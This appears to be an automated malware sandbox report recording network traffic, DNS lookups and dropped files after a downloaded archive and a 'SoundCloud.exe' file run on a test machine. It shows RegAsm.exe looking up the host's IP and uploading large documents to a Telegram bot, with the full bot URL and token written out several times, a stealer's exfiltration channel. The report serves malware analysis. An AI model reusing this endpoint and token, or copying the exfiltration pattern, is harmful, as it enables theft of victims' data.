                                            POST /bot6719312271:AAE1QFaFTcG0HSHiQXVv7gdDUMwSNOPMadg/sendDocument HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=----------------------------8dc75759e6e3965
                                            Host: api.telegram.org
                                            Content-Length: 428929
                                            Expect: 100-continue
                                            Connection: Keep-Alive
                                            Response
                                            HTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Thu, 16 May 2024 06:58:42 GMT
                                            Content-Type: application/json
                                            Content-Length: 919
                                            Connection: keep-alive
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                          • flag-nl
                                            POST
                                            https://api.telegram.org/bot6719312271:AAE1QFaFTcG0HSHiQXVv7gdDUMwSNOPMadg/sendDocument
                                            RegAsm.exe
                                            Remote address:
                                            149.154.167.220:443
                                            Request
                                            POST /bot6719312271:AAE1QFaFTcG0HSHiQXVv7gdDUMwSNOPMadg/sendDocument HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=----------------------------8dc75759e8f9a67
                                            Host: api.telegram.org
                                            Content-Length: 429057
                                            Expect: 100-continue
                                            Connection: Keep-Alive
                                            Response
                                            HTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Thu, 16 May 2024 06:58:43 GMT
                                            Content-Type: application/json
                                            Content-Length: 919
                                            Connection: keep-alive
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                          • 144.76.176.119:443
                                            https://workupload.com/fonts/roboto-v29-vietnamese_latin-ext_latin_greek-ext_greek_cyrillic-ext_cyrillic-300.woff2
                                            tls, http
                                            chrome.exe
                                            5.7kB
                                            157.5kB
                                            69
                                            122

                                            HTTP Request

                                            GET https://workupload.com/file/fkp8vSaWfcU

                                            HTTP Response

                                            200

                                            HTTP Request

                                            GET https://workupload.com/js/39b9ad5.js?v=KUUBLAOP

                                            HTTP Response

                                            200

                                            HTTP Request

                                            GET https://workupload.com/fonts/roboto-v29-vietnamese_latin-ext_latin_greek-ext_greek_cyrillic-ext_cyrillic-300.woff2

                                            HTTP Response

                                            200
                                          • 144.76.176.119:443
                                            https://workupload.com/puzzle
                                            tls, http
                                            chrome.exe
                                            3.8kB
                                            46.4kB
                                            29
                                            41

                                            HTTP Request

                                            GET https://workupload.com/css/4280ebd.css?v=KUUBLAOP

                                            HTTP Response

                                            200

                                            HTTP Request

                                            GET https://workupload.com/bundles/app/img/workupload_logo_medium.svg

                                            HTTP Response

                                            200

                                            HTTP Request

                                            GET https://workupload.com/puzzle

                                            HTTP Response

                                            200
                                          • 172.217.20.162:443
                                            googleads.g.doubleclick.net
                                            tls, http2
                                            chrome.exe
                                            999 B
                                            6.0kB
                                            9
                                            8
                                          • 142.250.179.78:443
                                            fundingchoicesmessages.google.com
                                            tls, http2
                                            chrome.exe
                                            1.0kB
                                            8.4kB
                                            10
                                            10
                                          • 49.13.126.162:443
                                            https://t.workupload.com/matomo.php?action_name=workupload%20-%20Are%20you%20a%20human%3F&idsite=1&rec=1&r=623249&h=6&m=57&s=4&url=https%3A%2F%2Fworkupload.com%2Ffile%2Ffkp8vSaWfcU&_id=&_idn=1&send_image=0&_refts=0&pv_id=34f1G1&pf_net=217&pf_srv=35&pf_tfr=1&pf_dm1=207&uadata=%7B%22fullVersionList%22%3A%5B%7B%22brand%22%3A%22Chromium%22%2C%22version%22%3A%22110.0.5481.104%22%7D%2C%7B%22brand%22%3A%22Not%20A(Brand%22%2C%22version%22%3A%2224.0.0.0%22%7D%2C%7B%22brand%22%3A%22Google%20Chrome%22%2C%22version%22%3A%22110.0.5481.104%22%7D%5D%2C%22mobile%22%3Afalse%2C%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2214.0.0%22%7D&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720
                                            tls, http
                                            chrome.exe
                                            4.1kB
                                            26.6kB
                                            23
                                            30

                                            HTTP Request

                                            GET https://t.workupload.com/matomo.js

                                            HTTP Response

                                            200

                                            HTTP Request

                                            POST https://t.workupload.com/matomo.php?action_name=workupload%20-%20Are%20you%20a%20human%3F&idsite=1&rec=1&r=623249&h=6&m=57&s=4&url=https%3A%2F%2Fworkupload.com%2Ffile%2Ffkp8vSaWfcU&_id=&_idn=1&send_image=0&_refts=0&pv_id=34f1G1&pf_net=217&pf_srv=35&pf_tfr=1&pf_dm1=207&uadata=%7B%22fullVersionList%22%3A%5B%7B%22brand%22%3A%22Chromium%22%2C%22version%22%3A%22110.0.5481.104%22%7D%2C%7B%22brand%22%3A%22Not%20A(Brand%22%2C%22version%22%3A%2224.0.0.0%22%7D%2C%7B%22brand%22%3A%22Google%20Chrome%22%2C%22version%22%3A%22110.0.5481.104%22%7D%5D%2C%22mobile%22%3Afalse%2C%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2214.0.0%22%7D&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720

                                            HTTP Response

                                            204
                                          • 144.76.176.119:443
                                            https://workupload.com/translations.js?en
                                            tls, http
                                            chrome.exe
                                            5.5kB
                                            25.9kB
                                            21
                                            28

                                            HTTP Request

                                            POST https://workupload.com/captcha

                                            HTTP Response

                                            200

                                            HTTP Request

                                            GET https://workupload.com/file/fkp8vSaWfcU

                                            HTTP Response

                                            200

                                            HTTP Request

                                            GET https://workupload.com/translations.js?en

                                            HTTP Response

                                            200
                                          • 144.76.176.119:443
                                            https://workupload.com/fonts/roboto-v29-vietnamese_latin-ext_latin_greek-ext_greek_cyrillic-ext_cyrillic-regular.woff2
                                            tls, http
                                            chrome.exe
                                            11.4kB
                                            245.5kB
                                            102
                                            189

                                            HTTP Request

                                            GET https://workupload.com/favicon.ico

                                            HTTP Response

                                            200

                                            HTTP Request

                                            GET https://workupload.com/js/39b9ad5.js?v=KUUBLA72

                                            HTTP Response

                                            200

                                            HTTP Request

                                            GET https://workupload.com/css/4280ebd.css?v=KUUBLA72

                                            HTTP Response

                                            200

                                            HTTP Request

                                            GET https://workupload.com/bundles/app/img/workupload_logo_small.svg

                                            HTTP Response

                                            200

                                            HTTP Request

                                            GET https://workupload.com/fonts/roboto-v29-vietnamese_latin-ext_latin_greek-ext_greek_cyrillic-ext_cyrillic-regular.woff2
                                          • 144.76.176.119:443
                                            https://workupload.com/fonts/fontawesome-webfont.woff2?v=4.7.0
                                            tls, http
                                            chrome.exe
                                            5.0kB
                                            83.0kB
                                            41
                                            69

                                            HTTP Request

                                            GET https://workupload.com/qr/file/fkp8vSaWfcU

                                            HTTP Response

                                            200

                                            HTTP Request

                                            GET https://workupload.com/fonts/fontawesome-webfont.woff2?v=4.7.0

                                            HTTP Response

                                            200
                                          • 144.76.176.119:443
                                            https://workupload.com/fonts/roboto-v29-vietnamese_latin-ext_latin_greek-ext_greek_cyrillic-ext_cyrillic-regular.woff2
                                            tls, http
                                            chrome.exe
                                            3.3kB
                                            53.0kB
                                            29
                                            45

                                            HTTP Request

                                            GET https://workupload.com/fonts/roboto-v29-vietnamese_latin-ext_latin_greek-ext_greek_cyrillic-ext_cyrillic-regular.woff2

                                            HTTP Response

                                            200
                                          • 144.76.176.119:443
                                            https://workupload.com/favicon/favicon.ico
                                            tls, http
                                            chrome.exe
                                            4.8kB
                                            68.9kB
                                            36
                                            58

                                            HTTP Request

                                            GET https://workupload.com/fonts/roboto-v29-vietnamese_latin-ext_latin_greek-ext_greek_cyrillic-ext_cyrillic-700.woff2

                                            HTTP Response

                                            200

                                            HTTP Request

                                            GET https://workupload.com/favicon/favicon.ico

                                            HTTP Response

                                            200
                                          • 144.76.176.119:443
                                            https://workupload.com/qr/file/fkp8vSaWfcU
                                            tls, http
                                            chrome.exe
                                            3.9kB
                                            6.1kB
                                            13
                                            13

                                            HTTP Request

                                            GET https://workupload.com/start/fkp8vSaWfcU

                                            HTTP Response

                                            200

                                            HTTP Request

                                            GET https://workupload.com/qr/file/fkp8vSaWfcU

                                            HTTP Response

                                            200
                                          • 144.76.176.119:443
                                            https://workupload.com/favicon/manifest.json
                                            tls, http
                                            chrome.exe
                                            1.7kB
                                            4.8kB
                                            12
                                            12

                                            HTTP Request

                                            GET https://workupload.com/favicon/manifest.json

                                            HTTP Response

                                            200
                                          • 144.76.176.119:443
                                            https://workupload.com/api/file/getDownloadServer/fkp8vSaWfcU
                                            tls, http
                                            chrome.exe
                                            3.8kB
                                            1.4kB
                                            12
                                            10

                                            HTTP Request

                                            GET https://workupload.com/api/file/getDownloadServer/fkp8vSaWfcU

                                            HTTP Response

                                            200
                                          • 94.130.130.53:443
                                            https://f81.workupload.com/download/fkp8vSaWfcU
                                            tls, http
                                            chrome.exe
                                            4.8kB
                                            148.2kB
                                            63
                                            115

                                            HTTP Request

                                            GET https://f81.workupload.com/download/fkp8vSaWfcU

                                            HTTP Response

                                            200
                                          • 94.130.130.53:443
                                            f81.workupload.com
                                            tls
                                            chrome.exe
                                            913 B
                                            4.2kB
                                            7
                                            10
                                          • 172.217.20.196:443
                                            www.google.com
                                            tls
                                            chrome.exe
                                            953 B
                                            4.8kB
                                            8
                                            9
                                          • 142.250.179.78:443
                                            https://consent.google.com/save?continue=https://www.google.com/search?q%3D7zip%26oq%3D7zip%26aqs%3Dchrome..69i57.3645j0j4%26sourceid%3Dchrome%26ie%3DUTF-8&gl=UK&m=0&pc=srp&x=5&src=2&hl=en&bl=gws_20240513-0_RC3&uxe=none&cm=2&set_eom=false&set_aps=true&set_sc=true
                                            tls, http2
                                            chrome.exe
                                            2.3kB
                                            10.5kB
                                            15
                                            17

                                            HTTP Request

                                            POST https://consent.google.com/save?continue=https://www.google.com/search?q%3D7zip%26oq%3D7zip%26aqs%3Dchrome..69i57.3645j0j4%26sourceid%3Dchrome%26ie%3DUTF-8&gl=UK&m=0&pc=srp&x=5&src=2&hl=en&bl=gws_20240513-0_RC3&uxe=none&cm=2&set_eom=false&set_aps=true&set_sc=true
                                          • 216.58.215.42:443
                                            https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTEwLjAuNTQ4MS4xMDQSEAlL1An4iaKj4hIFDUqFnlI=?alt=proto
                                            tls, http2
                                            chrome.exe
                                            1.8kB
                                            6.9kB
                                            15
                                            15

                                            HTTP Request

                                            GET https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTEwLjAuNTQ4MS4xMDQSEAlL1An4iaKj4hIFDUqFnlI=?alt=proto
                                          • 49.12.202.237:443
                                            https://www.7-zip.org/7ziplogo.png
                                            tls, http
                                            chrome.exe
                                            1.7kB
                                            5.6kB
                                            12
                                            14

                                            HTTP Request

                                            GET https://www.7-zip.org/7ziplogo.png

                                            HTTP Response

                                            200
                                          • 49.12.202.237:443
                                            https://www.7-zip.org/a/7z2405-x64.exe
                                            tls, http
                                            chrome.exe
                                            46.1kB
                                            1.7MB
                                            869
                                            1217

                                            HTTP Request

                                            GET https://www.7-zip.org/

                                            HTTP Response

                                            200

                                            HTTP Request

                                            GET https://www.7-zip.org/style.css

                                            HTTP Response

                                            200

                                            HTTP Request

                                            GET https://www.7-zip.org/favicon.ico

                                            HTTP Response

                                            200

                                            HTTP Request

                                            GET https://www.7-zip.org/a/7z2405-x64.exe

                                            HTTP Response

                                            200
                                          • 172.217.20.174:443
                                            play.google.com
                                            tls, http2
                                            chrome.exe
                                            1.0kB
                                            7.9kB
                                            10
                                            11
                                          • 52.111.236.22:443
                                            322 B
                                            7
                                          • 208.95.112.1:80
                                            http://ip-api.com/json/?fields=11827
                                            http
                                            RegAsm.exe
                                            308 B
                                            451 B
                                            5
                                            2

                                            HTTP Request

                                            GET http://ip-api.com/json/?fields=11827

                                            HTTP Response

                                            200
                                          • 208.95.112.1:80
                                            http://ip-api.com/json/?fields=11827
                                            http
                                            RegAsm.exe
                                            308 B
                                            451 B
                                            5
                                            2

                                            HTTP Request

                                            GET http://ip-api.com/json/?fields=11827

                                            HTTP Response

                                            200
                                          • 208.95.112.1:80
                                            http://ip-api.com/json/?fields=11827
                                            http
                                            RegAsm.exe
                                            308 B
                                            451 B
                                            5
                                            2

                                            HTTP Request

                                            GET http://ip-api.com/json/?fields=11827

                                            HTTP Response

                                            200
                                          • 149.154.167.220:443
                                            https://api.telegram.org/bot6719312271:AAE1QFaFTcG0HSHiQXVv7gdDUMwSNOPMadg/sendDocument
                                            tls, http
                                            RegAsm.exe
                                            554.9kB
                                            12.0kB
                                            444
                                            103

                                            HTTP Request

                                            POST https://api.telegram.org/bot6719312271:AAE1QFaFTcG0HSHiQXVv7gdDUMwSNOPMadg/sendDocument

                                            HTTP Response

                                            200
                                          • 149.154.167.220:443
                                            https://api.telegram.org/bot6719312271:AAE1QFaFTcG0HSHiQXVv7gdDUMwSNOPMadg/sendDocument
                                            tls, http
                                            RegAsm.exe
                                            534.5kB
                                            16.0kB
                                            400
                                            187

                                            HTTP Request

                                            POST https://api.telegram.org/bot6719312271:AAE1QFaFTcG0HSHiQXVv7gdDUMwSNOPMadg/sendDocument

                                            HTTP Response

                                            200
                                          • 149.154.167.220:443
                                            https://api.telegram.org/bot6719312271:AAE1QFaFTcG0HSHiQXVv7gdDUMwSNOPMadg/sendDocument
                                            tls, http
                                            RegAsm.exe
                                            488.5kB
                                            11.5kB
                                            393
                                            99

                                            HTTP Request

                                            POST https://api.telegram.org/bot6719312271:AAE1QFaFTcG0HSHiQXVv7gdDUMwSNOPMadg/sendDocument

                                            HTTP Response

                                            200
                                          • 8.8.8.8:53
                                            workupload.com
                                            dns
                                            chrome.exe
                                            520 B
                                            792 B
                                            8
                                            8

                                            DNS Request

                                            workupload.com

                                            DNS Response

                                            144.76.176.119

                                            DNS Request

                                            googleads.g.doubleclick.net

                                            DNS Response

                                            172.217.20.162

                                            DNS Request

                                            t.workupload.com

                                            DNS Response

                                            49.13.126.162

                                            DNS Request

                                            162.20.217.172.in-addr.arpa

                                            DNS Request

                                            fonts.gstatic.com

                                            DNS Response

                                            216.58.214.67

                                            DNS Request

                                            apis.google.com

                                            DNS Response

                                            142.250.178.142

                                            DNS Request

                                            237.202.12.49.in-addr.arpa

                                            DNS Request

                                            ip-api.com

                                            DNS Response

                                            208.95.112.1

                                          • 8.8.8.8:53
                                            162.201.250.142.in-addr.arpa
                                            dns
                                            350 B
                                            565 B
                                            5
                                            5

                                            DNS Request

                                            162.201.250.142.in-addr.arpa

                                            DNS Request

                                            www.google.com

                                            DNS Response

                                            172.217.20.196

                                            DNS Request

                                            163.214.58.216.in-addr.arpa

                                            DNS Request

                                            42.215.58.216.in-addr.arpa

                                            DNS Request

                                            1.112.95.208.in-addr.arpa

                                          • 8.8.8.8:53
                                            78.179.250.142.in-addr.arpa
                                            dns
                                            352 B
                                            589 B
                                            5
                                            5

                                            DNS Request

                                            78.179.250.142.in-addr.arpa

                                            DNS Request

                                            53.130.130.94.in-addr.arpa

                                            DNS Request

                                            www.gstatic.com

                                            DNS Response

                                            216.58.214.163

                                            DNS Request

                                            142.178.250.142.in-addr.arpa

                                            DNS Request

                                            29.243.111.52.in-addr.arpa

                                          • 8.8.8.8:53
                                            162.126.13.49.in-addr.arpa
                                            dns
                                            370 B
                                            833 B
                                            5
                                            5

                                            DNS Request

                                            162.126.13.49.in-addr.arpa

                                            DNS Request

                                            67.214.58.216.in-addr.arpa

                                            DNS Request

                                            content-autofill.googleapis.com

                                            DNS Response

                                            216.58.215.42
                                            142.250.179.74
                                            142.250.179.106
                                            142.250.178.138
                                            142.250.201.170
                                            142.250.75.234
                                            216.58.214.170
                                            172.217.20.170
                                            172.217.20.202

                                            DNS Request

                                            174.20.217.172.in-addr.arpa

                                            DNS Request

                                            nexusrules.officeapps.live.com

                                            DNS Response

                                            52.111.243.29

                                          • 224.0.0.251:5353
                                            chrome.exe
                                            204 B
                                            3
                                          • 172.217.20.196:443
                                            www.google.com
                                            https
                                            chrome.exe
                                            37.5kB
                                            1.2MB
                                            256
                                            1044
                                          • 142.250.178.142:443
                                            apis.google.com
                                            https
                                            chrome.exe
                                            4.8kB
                                            50.9kB
                                            26
                                            43
                                          • 172.217.20.174:443
                                            play.google.com
                                            https
                                            chrome.exe
                                            6.5kB
                                            9.8kB
                                            16
                                            15

                                          MITRE ATT&CK Enterprise v15

                                          Downloads

                                          • C:\Program Files\7-Zip\7-zip.dll

                                            Filesize

                                            99KB

                                          • C:\Program Files\7-Zip\7z.dll

                                            Filesize

                                            1.8MB

                                          • C:\Program Files\7-Zip\7zFM.exe

                                            Filesize

                                            960KB

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                            Filesize

                                            456B

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

                                            Filesize

                                            20KB

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                            Filesize

                                            2KB

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                            Filesize

                                            2B

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                            Filesize

                                            356B

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                            Filesize

                                            7KB

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                            Filesize

                                            8KB

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                            Filesize

                                            8KB

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Data

                                            Filesize

                                            100KB

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Version

                                            Filesize

                                            14B

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                            Filesize

                                            131KB

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                            Filesize

                                            131KB

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                            Filesize

                                            151KB

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                            Filesize

                                            131KB

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

                                            Filesize

                                            88KB

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

                                            Filesize

                                            102KB

                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log

                                            Filesize

                                            1KB

                                          • C:\Users\Admin\Desktop\SoundCloud.exe

                                            Filesize

                                            182KB

                                          • C:\Users\Admin\Downloads\7z2405-x64.exe

                                            Filesize

                                            1.5MB

                                          • C:\Users\Admin\Downloads\7z2405-x64.exe:Zone.Identifier

                                            Filesize

                                            26B

                                          • C:\Users\Admin\Downloads\alright prynce v2 fr.rar

                                            Filesize

                                            135KB

                                          • C:\Users\Admin\Downloads\alright prynce v2 fr.rar:Zone.Identifier

                                            Filesize

                                            120B

                                          • memory/1848-503-0x0000000000BD0000-0x0000000000BD1000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/1848-501-0x0000000000BD0000-0x0000000000BD1000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/3168-515-0x0000000001300000-0x0000000001301000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/4384-519-0x0000000000B10000-0x0000000000B11000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/4876-507-0x0000000005CF0000-0x0000000005D56000-memory.dmp

                                            Filesize

                                            408KB

                                          • memory/4876-502-0x0000000000400000-0x000000000041C000-memory.dmp

                                            Filesize

                                            112KB

                                          • memory/4876-511-0x0000000006690000-0x0000000006722000-memory.dmp

                                            Filesize

                                            584KB
